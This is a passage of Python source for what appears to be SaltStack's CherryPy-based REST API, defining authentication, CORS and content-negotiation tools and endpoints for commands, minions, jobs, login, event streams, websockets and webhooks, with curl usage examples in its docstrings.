libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
import collections
import itertools
import functools
import logging
import json
import time
from multiprocessing import Process, Pipe
# Import third-party libs
import cherrypy
from cherrypy.lib import cpstats
import yaml
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if not cherrypy.session.has_key('token'): # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except salt.exceptions.EauthAuthenticationError:
raise cherrypy.HTTPError(401)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
@functools.wraps
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
if (cherrypy.request.headers['Content-Type']
== 'application/x-www-form-urlencoded'):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if type(lowstate) != list:
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
import inspect
# Grab all available client interfaces
clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
predicate=inspect.ismethod) if not name.startswith('__')]
clients.remove('run') # run method calls client interfaces
return {
'return': "Welcome",
'clients': clients,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request**::
% curl -si https://localhost:8000 \\
-H "Accept: application/x-yaml" \\
-H "X-Auth-Token: d40d1e1e" \\
-d client=local \\
-d tgt='*' \\
-d fun='test.ping' \\
-d arg
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
fun=test.ping&arg&client=local&tgt=*
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request**::
% curl -sSi localhost:8000/minions \\
-H "Accept: application/x-yaml" \\
-d tgt='*' \\
-d fun='status.diskusage'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
tgt=*&fun=status.diskusage
**Example response**:
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request**::
% curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.lookup_jid' if jid else 'jobs.list_jobs',
'jid': jid,
}]
if jid:
lowstate.append({
'client': 'runner',
'fun': 'jobs.list_job',
'jid': jid,
})
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
job_ret, job_info = job_ret_info
ret['info'] = [job_info]
else:
job_ret = job_ret_info[0]
ret['return'] = [job_ret]
return ret
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -si localhost:8000/login \\
-H "Accept: application/json" \\
-d username='saltuser' \\
-d password='saltpass' \\
-d eauth='pam'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username=saltuser&password=saltpass&eauth=pam
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
perms = eauth.get(token['name'], eauth.get('*'))
if perms is None:
raise ValueError("Eauth permission list not found.")
except (AttributeError, IndexError, KeyError, ValueError):
logger.debug("Configuration for external_auth malformed for "
"eauth '{0}', and user '{1}'."
.format(token.get('eauth'), token.get('name')), exc_info=True)
raise cherrypy.HTTPError(500,
'Configuration for external_auth could not be read.')
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms,
}]}
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
'''
Class to run commands without normal session handling
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
.. http:post:: /run
This entry point is primarily for "one-off" commands. Each request
must pass full Salt authentication credentials. Otherwise this URL
is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.
:term:`lowstate` data describing Salt commands must be sent in the
request body.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='local' \\
-d tgt='*' \\
-d fun='test.ping' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='pam'
.. code-block:: http
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate()),
}
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request**::
% curl -NsS localhost:8000/events
.. code-block:: http
GET /events HTTP/1.1
Host: localhost:8000
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
data: {'tag': '', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
data: {'tag': '20130802115730568475', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
# Note, you must be authenticated!
var source = new EventSource('/events');
source.onopen = function() { console.debug('opening') };
source.onerror = function(e) { console.debug('error!', e) };
source.onmessage = function(e) { console.debug(e.data) };
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events', {withCredentials: true});
Some browser clients lack CORS support for the ``EventSource()`` API. Such
clients may instead pass the :mailheader:`X-Auth-Token` value as an URL
parameter::
% curl -NsS localhost:8000/events/6d1b722e
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
% curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
% curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
yield u'retry: {0}\n'.format(400)
while True:
data = stream.next()
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side::
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request**::
curl -NsS \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: http://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: http://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie::
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_sesion.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = stream.next()
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- 'curl -sS http://saltapi-url.example.com:8000/hook/travis/build/success -d branch="${TRAVIS_BRANCH}" -d commit="${TRAVIS_COMMIT}"'
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
